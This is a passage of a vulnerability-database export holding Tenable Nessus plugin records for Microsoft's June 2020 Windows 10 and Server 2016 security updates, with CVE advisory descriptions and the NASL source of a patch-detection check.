CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2020-1314)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561616.NASL", "href": "https://www.tenable.com/plugins/nessus/137258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137258);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561616\");\n script_xref(name:\"MSFT\", value:\"MS20-4561616\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", 
value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. 
An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. 
(CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. 
An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2020-1314)\");\n # https://support.microsoft.com/en-us/help/4561616/windows-10-update-kb4561616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0526efa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561616.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses 
the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. 
(CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. 
(CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. 
The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses 